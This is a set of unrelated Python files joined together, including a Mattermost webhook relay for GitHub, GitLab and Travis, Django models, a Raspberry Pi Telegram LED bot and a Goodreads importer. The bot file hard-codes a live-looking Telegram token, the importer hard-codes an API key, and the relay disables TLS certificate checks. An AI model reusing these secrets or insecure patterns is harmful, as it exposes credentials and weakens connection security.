    resource. Do not create a manager instance of this class directly
    """
    PROPERTIES = [
        'description',
        'addr_list',    # list of address items
        'set_list',     # sets can contain a list of sets
    ]

    def _xml_at_top(self):
        """Build the config XML stub: parent address-book plus this set's name."""
        xml = self.P._xml_at_top()
        xml.find('.//address-book').append(
            E('address-set',E.name(self._name))
        )
        return xml

    ##### -----------------------------------------------------------------------
    ##### XML reading
    ##### -----------------------------------------------------------------------

    def _xml_at_res(self, xml):
        """Locate this resource's <address-set> element within *xml*."""
        return xml.find('.//address-book/address-set')

    def _xml_to_py(self, as_xml, to_py ):
        """Convert the <address-set> XML into the property dict *to_py*."""
        Resource._r_has_xml_status( as_xml, to_py )
        Resource.copyifexists( as_xml, 'description', to_py )
        # Member addresses and nested address-sets, by name.
        to_py['addr_list'] = [name.text for name in as_xml.xpath('address/name')]
        to_py['set_list'] = [name.text for name in as_xml.xpath('address-set/name')]

    ##### -----------------------------------------------------------------------
    ##### XML writing
    ##### -----------------------------------------------------------------------

    def _xml_change_addr_list( self, xml ):
        """Emit add/delete <address> elements for changes to addr_list."""
        self._xml_list_property_add_del_names( xml,
            prop_name='addr_list', element_name='address')
        return True

    def _xml_change_set_list( self, xml ):
        """Emit add/delete <address-set> elements for changes to set_list."""
        self._xml_list_property_add_del_names( xml,
            prop_name='set_list',element_name='address-set')
        return True

    ##### -----------------------------------------------------------------------
    ##### Manager List, Catalog
    ##### -----------------------------------------------------------------------

    def _r_list(self):
        # list of address-book address-sets. this list is managed by the
        # parent object, so just use that, yo!
        self._rlist = self.P['$sets']

    def _r_catalog(self):
        """Populate self._rcatalog with every address-set found on the device."""
        get = self.P._xml_at_top()
        get.find('.//address-book').append(E('address-set'))
        got = self.D.rpc.get_config(get)
        for adrset in got.xpath('.//address-set'):
            name = adrset.find('name').text
            self._rcatalog[name] = {}
            self._xml_to_py( adrset, self._rcatalog[name] )
|
import json
import requests
from flask import request
from mattermostgithub import config, app
import hmac
import hashlib
# Pre-seeded HMAC-SHA1 template for GitHub webhook signature checks
# (copied per request); None when no secret is configured, in which case
# signature verification is skipped.
SECRET = hmac.new(config.SECRET, digestmod=hashlib.sha1) if config.SECRET else None
def check_signature_githubsecret(signature, secret, payload):
    """Verify a GitHub X-Hub-Signature HMAC-SHA1 hex digest.

    signature : hex digest string taken from the request header.
    secret    : pre-seeded hmac object (module-level SECRET); it is
                copied, never mutated.
    payload   : raw request body (bytes).
    Returns True when the digest matches.
    """
    mac = secret.copy()
    mac.update(payload)
    # hmac.compare_digest is constant-time; a plain `==` on the digest of
    # untrusted input leaks timing information about the match.
    return hmac.compare_digest(mac.hexdigest(), signature)
def get_travis_public_key():
    """Fetch the Travis-CI webhook public key.

    config.TRAVIS_CONFIG_URL is either the Travis /config endpoint URL or
    a local PEM file path (the latter is used for testing).
    """
    from urllib.parse import urlparse
    import os.path
    cfg_url = config.TRAVIS_CONFIG_URL
    if urlparse(cfg_url).scheme:
        # Remote config endpoint: the key lives inside the JSON config blob.
        resp = requests.get(config.TRAVIS_CONFIG_URL, timeout=10.0)
        resp.raise_for_status()
        return resp.json()['config']['notifications']['webhook']['public_key']
    if os.path.isfile(cfg_url):
        # Local file (for testing).
        with open(cfg_url, "r") as handle:
            key_bytes = handle.read().encode()
        if not key_bytes:
            raise RuntimeError("No public key found in {}".format(cfg_url))
        return key_bytes
    raise ValueError("Travis config url '{}' is neither a valid url nor an existing local file path".format(cfg_url))
import OpenSSL.crypto
def check_signature(signature, pubkey, payload):
    """Verify an RSA-SHA1 *signature* over *payload* with PEM key *pubkey*.

    Raises OpenSSL.crypto.Error when verification fails; returns None on
    success (pyOpenSSL's verify convention).
    """
    from OpenSSL.crypto import verify, load_publickey, FILETYPE_PEM, X509
    pkey_public_key = load_publickey(FILETYPE_PEM, pubkey)
    # pyOpenSSL's verify() operates on certificates, so wrap the bare
    # public key in an empty X509 object.
    cert = X509()
    cert.set_pubkey(pkey_public_key)
    verify(cert, signature, payload, str('sha1'))
@app.route(config.SERVER['hook'] or "/", methods=['GET'])
def alive():
    """Health-check endpoint: GET on the hook URL returns 200."""
    return 'Server Up and Running', 200
@app.route(config.SERVER['hook'] or "/", methods=['POST'])
def root():
    """Webhook entry point: dispatch GitHub, Travis-CI or GitLab notifications.

    The source is detected from request headers; each source is
    authenticated with its own scheme before its handler runs.
    """
    if "X-Github-Event" in request.headers:
        ## assume Github notification, authenticate if needed
        if SECRET:
            signature = request.headers.get('X-Hub-Signature', None)
            if not signature:
                return 'Missing X-Hub-Signature', 400
            if not check_signature_githubsecret(signature.split("=")[1], SECRET, request.data):
                return 'Invalid X-Hub-Signature', 400
        json_data = request.json
        if not json_data:
            print('Invalid Content-Type')
            return 'Content-Type must be application/json and the request body must contain valid JSON', 400
        try:
            return handle_github(json_data, request.headers['X-Github-Event'])
        except Exception as ex:
            print("Error interpreting github notification: {}".format(ex))
            return "Internal error", 400
    elif "Travis-Repo-Slug" in request.headers:
        payload = request.form.get("payload")
        if not payload:
            return "Invalid payload", 400
        ### Travis-CI notification, verify
        ## adapted from https://gist.github.com/andrewgross/8ba32af80ecccb894b82774782e7dcd4
        if config.TRAVIS_CONFIG_URL:
            if "Signature" not in request.headers:
                return "No signature", 404
            import base64
            signature = base64.b64decode(request.headers["Signature"])
            try:
                pubkey = get_travis_public_key()
            except requests.Timeout:
                print("Travis public key timeout")
                return "Could not get travis server public key", 400
            except requests.RequestException as ex:
                # BUGFIX: `ex.message` does not exist on Python 3
                # exceptions and raised AttributeError here; format the
                # exception object itself instead.
                print("Travis public key exception: {0}".format(ex))
                return "Could not get travis server public key", 400
            except Exception as ex:
                print("Problem getting public key: {}".format(ex))
                return "Internal error", 400
            try:
                check_signature(signature, pubkey, payload)
            except OpenSSL.crypto.Error:
                print("Request failed verification")
                return "Unauthorized", 404
        try:
            data = json.loads(payload)
            return handle_travis(data)
        except Exception as ex:
            print("Error interpreting travis notification: {}".format(ex))
            return "Internal error", 400
    elif "X-Gitlab-Event" in request.headers:
        ## Gitlab notification, authenticate if needed
        if ( not config.GITLAB_SECRET ) or request.headers.get("X-Gitlab-Token", None) != config.GITLAB_SECRET:
            return "Invalid X-Gitlab-Token", 400
        json_data = request.json
        if not json_data:
            print('Invalid Content-Type')
            return 'Content-Type must be application/json and the request body must contain valid JSON', 400
        try:
            return handle_gitlab(json_data, request.headers['X-Gitlab-Event'])
        except Exception as ex:
            print("Error interpreting gitlab notification: {}".format(ex))
            return "Internal error", 400
    else:
        print("Unknown notification type")
        return "Unknown notification type", 400
def handle_github(data, event):
    """Translate a GitHub webhook *event* payload into a Mattermost post.

    Returns a response string (optionally a (string, status) tuple) for
    Flask.
    """
    from mattermostgithub.github_payload import (
        PullRequest, PullRequestComment, Issue, IssueComment,
        Repository, Branch, Push, Tag, CommitComment, Wiki
    )
    msg = ""
    if event == "ping":
        msg = "ping from %s" % data['repository']['full_name']
    elif event == "pull_request":
        if data['action'] == "opened":
            msg = PullRequest(data).opened()
        elif data['action'] == "closed":
            msg = PullRequest(data).closed()
        elif data['action'] == "assigned":
            msg = PullRequest(data).assigned()
        elif data['action'] == "synchronize":
            msg = PullRequest(data).synchronize()
    elif event == "issues":
        if data['action'] == "opened":
            msg = Issue(data).opened()
        elif data['action'] == "closed":
            msg = Issue(data).closed()
        elif data['action'] == "labeled":
            msg = Issue(data).labeled()
        elif data['action'] == "assigned":
            msg = Issue(data).assigned()
    elif event == "issue_comment":
        if data['action'] == "created":
            msg = IssueComment(data).created()
    elif event == "repository":
        if data['action'] == "created":
            msg = Repository(data).created()
    elif event == "create":
        if data['ref_type'] == "branch":
            msg = Branch(data).created()
        elif data['ref_type'] == "tag":
            msg = Tag(data).created()
    elif event == "delete":
        if data['ref_type'] == "branch":
            msg = Branch(data).deleted()
    elif event == "pull_request_review_comment":
        if data['action'] == "created":
            msg = PullRequestComment(data).created()
    elif event == "push":
        if not (data['deleted'] and data['forced']):
            # Tag pushes are reported by the "create" event, skip them here.
            if not data['ref'].startswith("refs/tags/"):
                msg = Push(data).commits()
    elif event == "commit_comment":
        if data['action'] == "created":
            msg = CommitComment(data).created()
    elif event == "gollum":
        msg = Wiki(data).updated()
    if msg:
        hook_info = get_hook_info(data)
        if hook_info:
            # BUGFIX: reuse the already-computed hook_info instead of
            # calling get_hook_info(data) a second time.
            url, channel = hook_info
            # BUGFIX: use data.get('action') — events such as push/gollum
            # carry no 'action' key and previously raised KeyError when
            # listed in GITHUB_IGNORE_ACTIONS.
            if hasattr(config, "GITHUB_IGNORE_ACTIONS") and \
               event in config.GITHUB_IGNORE_ACTIONS and \
               data.get('action') in config.GITHUB_IGNORE_ACTIONS[event]:
                return "Notification action ignored (as per configuration)"
            post(msg, url, channel)
            return "Notification successfully posted to Mattermost"
        else:
            return "Notification ignored (repository is blacklisted)."
    else:
        return "Not implemented", 400
def handle_travis(data):
    """Translate a Travis-CI build notification into a Mattermost post.

    Supports 'push' and 'pull_request' build types; raises ValueError for
    anything else.
    """
    ## repo info
    repo_msg = "[{name}]({url})".format(name=data["repository"]["name"], url=data["repository"]["url"])
    ## status message
    buildstatus_msg = "[#{no}]({url}) {status}".format(
        no=data["number"],
        url=data["build_url"],
        status=data["status_message"].lower())
    ## interpret event
    ntype = data["type"]
    event_msg = "EVENT_PLACEHOLDER"
    if ntype == "push":
        event_msg = "pushed commit {commit} on branch {branch} by {author}".format(
            commit="[{0}]({1})".format(data["message"].split("\n")[0], data["compare_url"]),
            branch=data["branch"],
            author=("[{name}](mailto:{mail}){0}".format(
                ( "" if data["author_name"] == data["committer_name"] and data["author_email"] == data["committer_email"]
                  else " with [{name}](mailto:{mail})".format(name=data["committer_name"], mail=data["committer_email"]))
                , name=data["author_name"], mail=data["author_email"]
                )
            )
        )
    elif ntype == "pull_request":
        event_msg = "pull request {prid} \"{prtitle}\" by {author}".format(
            prid="[#{0}]({1})".format(data["pull_request_number"], data["compare_url"]),
            prtitle=data["pull_request_title"],
            # BUGFIX: the author link was missing the mailto: scheme that
            # the push branch uses, yielding a broken markdown link.
            author="[{name}](mailto:{mail})".format(name=data["author_name"], mail=data["author_email"])
        )
    else:
        raise ValueError("Unknown event type {}".format(data["type"]))
    msg = "Travis build {build_status} for {event} in {repo}".format(
        repo=repo_msg,
        build_status=buildstatus_msg,
        event=event_msg)
    hook_info = get_hook_info(data)
    if hook_info:
        url, channel = hook_info
        post(msg, url, channel)
        return "Notification successfully posted to Mattermost"
    else:
        return "Notification ignored (repository is blacklisted)."
def handle_gitlab(data, event):
    """Build and post a Mattermost notification for a GitLab webhook.

    *event* is the GitLab event name (the X-Gitlab-Event header value).
    Returns a human-readable status string, or the tuple
    ("Not implemented", 400) for recognised-but-unsupported events.
    """
    import os.path
    def puser_link(udata, web_base):  ## for push events
        # Push payloads carry flat user_name / user_username / user_avatar keys.
        nmemail = "[{nm}]({profile})".format(nm=udata["user_name"], profile=os.path.join(web_base, udata["user_username"])) if "user_username" in udata else udata["user_name"]
        if config.SHOW_AVATARS:
            # NOTE(review): the "av" argument is never referenced by the
            # format string -- avatar markup appears to have been lost; confirm.
            return " {nm}".format(av=udata["user_avatar"], nm=nmemail)
        return nmemail
    def user_link(udata, web_base):
        # Non-push payloads nest the user under "user" with name/username keys.
        nmemail = "[{nm}]({profile})".format(nm=udata["name"], profile=os.path.join(web_base, udata["username"]))
        if config.SHOW_AVATARS:
            # NOTE(review): "av" is unused here as well (see puser_link).
            return " {nm}".format(av=udata["avatar_url"], nm=nmemail)
        return nmemail
    def repo_link(projdata):
        return "[{nm}]({url})".format(nm=projdata["path_with_namespace"], url=projdata["homepage"])
    def ref_link(ref, repourl):
        # Drop the "refs/heads/" (or "refs/tags/") prefix from the full ref.
        return "[{nm}]({repourl}/tree/{nm})".format(nm="/".join(ref.split("/")[2:]), repourl=repourl)
    def commit_linkmsg(cdata):
        # Short hash linked to the commit, plus the first line of its message.
        return "[`{chsh}`]({curl}) {cmsg}".format(
            chsh=cdata["id"][:7]
            , curl=cdata["url"]
            , cmsg=cdata["message"].split("\n")[0]
            )
    def issuemrsnippet_link(objdata, url):
        # Issues/MRs expose "iid"; snippets only have "id".
        return "[#{iid}: {title}]({url})".format(iid=objdata.get("iid", objdata["id"]), title=objdata["title"], url=url)
    # Map GitLab action verbs to past-tense English for the message text.
    actionTransl = {
        "open" : "opened"
        , "close" : "closed"
        , "update" : "updated"
        , "merge" : "merged"
        , "reopen" : "reopened"
        , "create" : "created"
        , "delete" : "deleted"
        }
    # Push events carry "repository"; other events carry "project".
    repoweb = data["repository"]["homepage"] if "repository" in data else data["project"]["web_url"]
    webbase = "/".join(repoweb.split("/")[:-2])  ## remove last two paths
    attrs = data.get("object_attributes", dict())
    msg = None  # stays None for unsupported events -> 400 below
    if event == "Push Hook":
        msg = "{user} pushed {ncomm} to {branch} in {repo}\n{commitlist}".format(
            user=puser_link(data, webbase)
            , repo=repo_link(data["project"])
            , branch=ref_link(data["ref"], repourl=repoweb)
            , ncomm=("{0:d} commits".format(data["total_commits_count"]) if data["total_commits_count"] > 1 else "a commit")
            , commitlist="\n".join("- {}".format(commit_linkmsg(cdata)) for cdata in data["commits"])
            )
    elif event == "Tag Push Hook":
        if data["object_kind"] == "tag_push":
            msg = "{user} pushed tag {tag} in {repo}".format(
                user=puser_link(data, webbase)
                , repo=repo_link(data["project"])
                , tag=ref_link(data["ref"], repourl=repoweb)
                )
        else:
            raise ValueError("Tag Push Hook with object_kind={0!r}".format(data["object_kind"]))
    elif event == "Note Hook":
        # Comments can be attached to commits, MRs, issues, or snippets.
        ntype = attrs["noteable_type"]
        if ntype == "Commit":
            objlink = "commit {}".format(commit_linkmsg(data["commit"]))
        else:
            # Maps noteable_type -> (payload key, human-readable description).
            nttypes = { "MergeRequest" : ("merge_request", "merge request")
                      , "Issue" : ("issue", "issue")
                      , "Snippet" : ("snippet", "snippet")
                      }
            if ntype not in nttypes:
                raise ValueError("Not a valid noteable_type: '{}'".format(ntype))
            else:
                # Strip the "#note_NNN" fragment to link the object itself.
                issuemrsnippet_url = attrs["url"].split("#")[0]
                objlink = "{descr} {link}".format(descr=nttypes[ntype][1], link=issuemrsnippet_link(data[nttypes[ntype][0]], url=issuemrsnippet_url))
        msg = "{user} added [a comment]({noteurl}) on {obj} in {repo}\n{note}".format(
            user=user_link(data["user"], webbase)
            , noteurl=attrs["url"]
            , obj=objlink
            , repo=repo_link(data["project"])
            , note="\n".join("> {}".format(ln) for ln in attrs["note"].split("\n"))  ## quote
            )
    elif event in ("Issue Hook", "Merge Request Hook"):
        msg = "{user} {verb} {what} [#{iid}: {title}]({url}) for {repo}{more}".format(
            user=user_link(data["user"], webbase)
            , verb=actionTransl[attrs["action"]]
            , what=" ".join(tok.lower() for tok in event.split(" ")[:-1])
            , iid=attrs["iid"], title=attrs["title"], url=attrs["url"]
            , repo=repo_link(data["project"])
            , more=("\n{}".format("\n".join("> {}".format(ln) for ln in attrs["description"].split("\n"))) if attrs["action"] == "open" and len(attrs["description"]) > 0 else "")
            )
    elif event == "Wiki Page Hook":
        msg = "{user} {verb} wiki page [{title}]({url}) for {project}".format(
            user=user_link(data["user"], webbase)
            , verb=actionTransl[attrs["action"]]
            , title=attrs["title"], url=attrs["url"]
            , project="[{name}]({url})".format(name=data["project"]["name"], url=data["project"]["web_url"])
            )
    elif event == "Pipeline Hook":
        pass  ## not supported yet
    elif event == "Build Hook":
        pass  ## not supported yet
    else:
        raise ValueError("Unknown event: {0}".format(event))
    if msg:
        hook_info = get_hook_info(data)
        if hook_info:
            url, channel = hook_info
            # Configuration can suppress whole event classes.
            if ( hasattr(config, "GITLAB_IGNORE_ACTIONS") and
                 ( event in config.GITLAB_IGNORE_ACTIONS
                   or data.get("object_kind", None) in config.GITLAB_IGNORE_ACTIONS ) ):
                return "Notification action ignored (as per configuration)"
            post(msg, url, channel)
            return "Notification successfully posted to Mattermost"
        else:
            return "Notification ignored (repository is blacklisted)."
    else:
        return "Not implemented", 400
def post(text, url, channel):
    """Post *text* to the Mattermost incoming-webhook *url* on *channel*.

    Username and icon come from module-level config.  Errors are logged to
    stdout; nothing is raised.
    """
    data = {}
    data['text'] = text
    data['channel'] = channel
    data['username'] = config.USERNAME
    data['icon_url'] = config.ICON_URL
    headers = {'Content-Type': 'application/json'}
    # NOTE(review): verify=False disables TLS certificate validation;
    # consider making this configurable.
    r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)
    # BUGFIX: "is not" compared object identity, which only worked because
    # CPython caches small ints; compare status codes with != instead.
    if r.status_code != requests.codes.ok:
        print('Encountered error posting to Mattermost URL %s, status=%d, response_body=%s' % (url, r.status_code, r.json()))
def get_hook_info(data):
    """Resolve the Mattermost (url, channel) pair for a webhook payload.

    Walks a list of candidate key paths covering GitHub, GitLab and Travis
    payload shapes; the first leaf value found in MATTERMOST_WEBHOOK_URLS
    wins.  Falls back to the "default" entry.
    """
    candidate_paths = [
        ## for Github
        ("repository", "full_name")
        , ("organization", "login")
        , ("repository", "owner", "login")
        , ("repository", "owner", "name")
        ## for Gitlab
        , ("project", "path_with_namespace")
        , ("project", "namespace")
        ## for travis
        , ("repository", "url")
        , ("repository", "name")
        , ("repository", "owner_name")
        ]
    settings = config.MATTERMOST_WEBHOOK_URLS
    for path in candidate_paths:
        node = data
        for depth, key in enumerate(path):
            if key not in node:
                break  # this path doesn't exist in the payload; try the next
            node = node[key]
            if depth == len(path) - 1 and node in settings:
                return settings[node]
    return config.MATTERMOST_WEBHOOK_URLS["default"]
if __name__ == "__main__":
    # Fall back to all interfaces / port 5000 when the configured
    # address/port are empty (falsy).
    app.run(
        host=config.SERVER['address'] or "0.0.0.0",
        port=config.SERVER['port'] or 5000,
        debug=False
    )
|
import unittest
from selenium import webdriver
from test_project.pageObjects.Pages.main_page import MainPage
from test_project.pageObjects.Pages.login_page import LoginPage
from test_project.pageObjects.Pages.secure_area_page import SecurePage
class TestLogin(unittest.TestCase):
    """End-to-end login flow test against the-internet.herokuapp.com."""

    def setUp(self):
        # Fresh, maximized browser per test keeps tests independent.
        self.driver = webdriver.Chrome()
        self.driver.maximize_window()
        self.driver.get("http://the-internet.herokuapp.com/")

    def tearDown(self):
        self.driver.quit()

    def test_auth_flow(self):
        """Navigate to the login form, sign in, and verify success."""
        main_page = MainPage(self.driver)
        login_page = LoginPage(self.driver)
        secure_area = SecurePage(self.driver)
        main_page.go_login()
        login_page.login_fields_("tomsmith", "SuperSecretPassword!")
        secure_area.button_with_()
        # Use unittest's assertion for a descriptive failure message
        # (also removed the unused "logout_page" local).
        self.assertTrue(login_page.success_message_displayed())
|
import numpy as np
from math import acos, degrees
from util.graph import Graph
# Two 2-D vectors whose angle we want to measure and plot.
u = np.array([-5, -1])
v = np.array([4, 2])

# cos(theta) = (u . v) / (|u| |v|)
n = u @ v
d = np.linalg.norm(u) * np.linalg.norm(v)
# Clamp to [-1, 1] so floating-point round-off (e.g. for near-parallel
# vectors) cannot push the ratio outside acos's domain.
cos_angle = min(1.0, max(-1.0, n / d))
angle = acos(cos_angle)
print(f'{degrees(angle)} degrees')

g = Graph()
g.add_vector(u, color='b')
g.add_vector(v, color='g')
g.show()
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Bookstore(models.Model):
    """A bookstore with a display name and its website URL."""
    name = models.CharField(max_length=100)
    # NOTE(review): consider URLField for validation; kept as CharField
    # here since changing it requires a migration.
    url = models.CharField(max_length=200)
    def __str__(self):
        return self.name
class Company(models.Model):
    """A company with a contact email and the bookstores it works with."""
    name = models.CharField(max_length=100)
    company_email = models.CharField(max_length=60)
    bookstores = models.ManyToManyField(Bookstore)

    class Meta:
        ordering = ['name']
        permissions = (
            ('group_user', 'Can Only View Their Company and Edit Their Information'),
            # BUGFIX: "nd" -> "and" in the human-readable permission name.
            ('group_admin', 'Can View and Edit All Companies and Users')
        )

    def display_bookstores(self):
        """Comma-separated bookstore names, for the admin list display."""
        return ', '.join(bookstore.name for bookstore in self.bookstores.all())
    display_bookstores.short_description = 'Bookstore'

    def __str__(self):
        return self.name
class Employee(models.Model):
    """A user's employee profile: one-to-one with auth.User, belonging to
    a Company, with a per-employee query counter."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=100)
    company = models.ForeignKey('Company', on_delete=models.CASCADE)
    email = models.EmailField(unique=True)
    # Number of queries made by this employee (incremented elsewhere).
    num_queries = models.IntegerField(default=0)
    def __str__(self):
        output = "{} {}, {}, {}"
        return output.format(self.name, self.email, self.company, self.num_queries)
|
# Simple canvas demo
import tkinter
baseFrame = tkinter.Tk()
cvs = tkinter.Canvas(baseFrame, width=300, height=200)
cvs.pack()
# A line is defined by two points (start and end).
# The numeric arguments are in pixels.
cvs.create_line(23, 23, 190, 234)
cvs.create_text(56, 67, text="I LOVE PYTHON")
baseFrame.mainloop()
|
import csv
import os
import requests
from flask import Flask, render_template, request
from modal import *
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)
# Database URL comes from the environment (e.g. a Heroku-style DATABASE_URL).
app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
# Set up database
engine = create_engine(os.getenv("DATABASE_URL"))
# Thread-local session factory bound to the engine.
db = scoped_session(sessionmaker(bind=engine))
def main():
    """Import books.csv into the "book" table, enriching each row with
    review counts and the average rating from the Goodreads API.

    NOTE(review): assumes books.csv has no header row -- a header would
    make int(year) raise ValueError; confirm against the data file.
    NOTE(review): the Goodreads API key is hard-coded; consider moving it
    to an environment variable.
    """
    # Context manager guarantees the CSV file is closed (previously the
    # file handle was leaked).
    with open("books.csv") as f:
        reader = csv.reader(f)
        for isbn, title, author, year in reader:
            res = requests.get("https://www.goodreads.com/book/review_counts.json", params={"key": "8pV2dRbipRugYtFReyCnw", "isbns": isbn})
            if res.status_code == 200:
                res_text = res.json()
                for book in res_text["books"]:
                    # Renamed from "id" to avoid shadowing the builtin.
                    book_id = int(book["id"])
                    review_count = int(book["reviews_count"])
                    average_score = float(book["average_rating"])
                    db.execute('INSERT INTO "book" (id, title, author,year,isbn,reviewcount,averagescore) VALUES (:id, :title, :author, :year, :isbn, :review_count, :average_score)',
                               {"id": book_id, "title": title, "author": author, "year": int(year), "isbn": isbn, "review_count": review_count, "average_score": average_score})
    # Commit once after the loop rather than per row.
    db.commit()
if __name__ == "__main__":
    # Run the import inside an application context so Flask extensions
    # that need one behave correctly.
    with app.app_context():
        main()
|
from crummycm.validation.types.placeholders.placeholder import (
KeyPlaceholder,
ValuePlaceholder,
)
from crummycm.validation.types.dicts.foundation.unnamed_dict import UnnamedDict
from crummycm.validation.types.dicts.foundation.known_dict import KnownDict
from crummycm.validation.types.dicts.config_dict import ConfigDict as CD
from crummycm.validation.types.values.element.numeric import Numeric
from crummycm.validation.types.values.element.text import Text
# from crummycm.validation.types.values.base import BaseValue
# Test fixtures for crummycm validation: each constant is a config spec
# mixing a fixed key ("kd_num"), placeholder keys, and a wildcard value
# placeholder, in various nesting / required-flag combinations.

# Single named entry whose value mixes fixed, placeholder and wildcard keys.
A_mixed_all_single = {
    "my_mixed": CD(
        {
            "kd_num": Numeric(default_value=int(0), required=False, is_type=int),
            KeyPlaceholder("some_str", ends_with="_str"): Text(),
            KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
            "wild_card": ValuePlaceholder("wild_card_value"),
        }
    )
}

# Same mixed spec, but as the top-level ConfigDict itself.
# NOTE(review): "outter" is a typo for "outer"; renaming would break importers.
A_mixed_outter = CD(
    {
        "kd_num": Numeric(default_value=int(0), required=False, is_type=int),
        KeyPlaceholder("some_str", ends_with="_str"): Text(),
        KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
        "wild_card": ValuePlaceholder("wild_card_value"),
    }
)

# Named-entry variant with an additional nested ConfigDict under "nested_md".
A_mixed_all_single_nested = {
    "my_mixed": CD(
        {
            "kd_num": Numeric(default_value=int(0), required=False, is_type=int),
            KeyPlaceholder("some_str", ends_with="_str"): Text(),
            KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
            "wild_card": ValuePlaceholder("wild_card_value"),
            "nested_md": CD(
                {
                    "kd_num": Numeric(
                        default_value=int(0), required=False, is_type=int
                    ),
                    KeyPlaceholder("some_str", ends_with="_str"): Text(),
                    KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
                    "wild_card": ValuePlaceholder("wild_card_value"),
                }
            ),
        }
    )
}

# Top-level variant with the same "nested_md" nesting.
A_mixed_outter_nested = CD(
    {
        "kd_num": Numeric(default_value=int(0), required=False, is_type=int),
        KeyPlaceholder("some_str", ends_with="_str"): Text(),
        KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
        "wild_card": ValuePlaceholder("wild_card_value"),
        "nested_md": CD(
            {
                "kd_num": Numeric(default_value=int(0), required=False, is_type=int),
                KeyPlaceholder("some_str", ends_with="_str"): Text(),
                KeyPlaceholder("some_num"): ValuePlaceholder("user_num"),
                "wild_card": ValuePlaceholder("wild_card_value"),
            }
        ),
    }
)

# Key placeholder marked optional (required=False); value placeholder required.
mixed_all_single_key_unnamed_req_false = {
    "my_mixed": CD(
        {
            "kd_num": Numeric(default_value=int(0), is_type=int),
            KeyPlaceholder("some_str", ends_with="_str", required=False): Text(),
            KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
            "wild_card": ValuePlaceholder("wild_card_value"),
        }
    )
}

# As above, but the Text value is also optional.
mixed_all_single_key_unnamed_req_false_v_req_false = {
    "my_mixed": CD(
        {
            "kd_num": Numeric(default_value=int(0), is_type=int),
            KeyPlaceholder("some_str", ends_with="_str", required=False): Text(
                required=False
            ),
            KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
            "wild_card": ValuePlaceholder("wild_card_value"),
        }
    )
}

# As above, but the optional Text value carries a default.
mixed_all_single_key_unnamed_req_false_v_req_false_default = {
    "my_mixed": CD(
        {
            "kd_num": Numeric(default_value=int(0), is_type=int),
            KeyPlaceholder("some_str", ends_with="_str", required=False): Text(
                default_value="DIESEL"
            ),
            KeyPlaceholder("some_num", required=True): ValuePlaceholder("user_num"),
            "wild_card": ValuePlaceholder("wild_card_value"),
        }
    )
}
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-07-04 20:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: widen CharField max_lengths.

    NOTE: generated by Django's makemigrations; edit with care, since
    applied migrations are recorded by name in the database.
    """
    dependencies = [
        ('LedgerBoardApp', '0003_auto_20170704_1854'),
    ]
    operations = [
        # 64-character fields -- presumably hex digests; confirm upstream.
        migrations.AlterField(
            model_name='block',
            name='blockHash',
            field=models.CharField(max_length=64),
        ),
        migrations.AlterField(
            model_name='block',
            name='target',
            field=models.CharField(max_length=64),
        ),
        migrations.AlterField(
            model_name='post',
            name='publicKeyOfSender',
            field=models.CharField(max_length=128),
        ),
    ]
|
import unittest
import spelling
class TestNameSpace(unittest.TestCase):
    """Smoke test for the public spelling-correction API."""
    def test_predict(self):
        # As such because the built in model is not trained, only all words are added
        self.assertIn(spelling.predict("bway"), ["way", "bay", "away", "sway", "tway", "bray"])
import time, datetime
import RPi.GPIO as GPIO
import telepot
from telepot.loop import MessageLoop
# BCM pin numbers for the four LEDs.
blue = 6
yellow = 13
red= 19
green= 26
# NOTE(review): "now" appears unused in this script -- confirm and remove.
now = datetime.datetime.now()
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
##LED Blue
GPIO.setup(blue, GPIO.OUT)
GPIO.output(blue, 0) #Off initially
#LED Yellow
GPIO.setup(yellow, GPIO.OUT)
GPIO.output(yellow, 0) #Off initially
#LED Red
GPIO.setup(red, GPIO.OUT)
GPIO.output(red, 0) #Off initially
#LED green
GPIO.setup(green, GPIO.OUT)
GPIO.output(green, 0) #Off initially
def action(msg):
    """Handle one incoming Telegram message: echo the command menu, then
    switch the requested LED(s) on or off via GPIO.

    Colour names are matched as substrings of the message text; "all"
    drives every LED at once.
    """
    chat_id = msg['chat']['id']
    command = msg['text']
    print ('Received: %s' % command)
    # Always echo the available commands back first.
    telegram_bot.sendMessage(chat_id, "comandos")
    telegram_bot.sendMessage(chat_id, "all on \n all off \n blue on \n yellow on \n red on \n green on \n blue off \n yellow off \n red off \n green off ")
    # (name, BCM pin) pairs, in the reply-message order.
    leds = (('blue', blue), ('yellow', yellow), ('red', red), ('green', green))
    if 'on' in command:
        reply = "on"
        for name, pin in leds:
            if name in command:
                reply = reply + name + " "
                GPIO.output(pin, 1)
        if 'all' in command:
            reply = reply + "all "
            for _, pin in leds:
                GPIO.output(pin, 1)
        reply = reply + "light(s)"
        telegram_bot.sendMessage(chat_id, reply)
    if 'off' in command:
        reply = "off "
        for name, pin in leds:
            if name in command:
                reply = reply + name + " "
                GPIO.output(pin, 0)
        if 'all' in command:
            reply = reply + "all "
            for _, pin in leds:
                GPIO.output(pin, 0)
        reply = reply + "light(s)"
        telegram_bot.sendMessage(chat_id, reply)
# NOTE(review): the bot token is hard-coded in source and has been exposed --
# rotate it and load it from an environment variable or config file instead.
telegram_bot = telepot.Bot('1811246047:AAG8DNKb6csehwWXjXjETnsoZadDuQ_E0eA')
print (telegram_bot.getMe())
# Poll Telegram for messages in a background thread, dispatching to action().
MessageLoop(telegram_bot, action).run_as_thread()
print ('Up and Running....')
# Keep the main thread alive so the background message loop keeps running.
while 1:
    time.sleep(10)
|
from binary_search import binary_search
list = [i for i in range(129)]
list2 = [i for i in range(259)]
# print list
# print binary_search(list,111)
# print binary_search(list,66)
# print binary_search(list,128)
print binary_search(list2,258) |
import theano
import theano.tensor as T
from collections import OrderedDict
